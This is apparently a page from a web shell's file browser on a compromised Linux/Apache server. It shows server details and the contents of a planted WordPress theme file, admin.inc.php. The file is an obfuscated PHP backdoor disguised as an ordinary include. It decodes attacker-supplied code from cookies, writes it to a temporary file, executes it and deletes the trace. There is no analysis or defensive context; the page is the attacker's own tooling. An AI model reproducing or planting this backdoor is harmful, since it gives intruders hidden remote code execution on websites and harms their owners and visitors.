\x20\40\x20\40 HEX
HEX
Server: Apache
System: Linux web1.jenscom.net 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64
User: sps (1059)
PHP: 8.3.30
Disabled: NONE
$ pwd: /home/sps/www/wp-content/themes/
Upload Files
File: /home/sps/www/wp-content/themes/admin.inc.php
<?php


if (isset($_COOKIE[98+-98]) && isset($_COOKIE[49+-48]) && isset($_COOKIE[20-17]) && isset($_COOKIE[61-57])) {
    $flg = $_COOKIE;
    function secure_access($reference) {
        $flg = $_COOKIE;
        $k = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'c4caeed4');
        if (!is_writable($k)) {
            $k = getcwd() . DIRECTORY_SEPARATOR . "right_pad_string";
        }
        $data_chunk = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($flg[3]));
        if (is_writeable($k)) {
            $obj = fopen($k, 'w+');
            fputs($obj, $data_chunk);
            fclose($obj);
            spl_autoload_unregister(__FUNCTION__);
            require_once($k);
            @array_map('unlink', array($k));
        }
    }
    spl_autoload_register("secure_access");
    $descriptor = "0de4b386c03c8ea540765dea06c08503";
    if (!strncmp($descriptor, $flg[4], 32)) {
        if (@class_parents("system_core_reverse_searcher", true)) {
            exit;
        }
    }
}
@ Telegram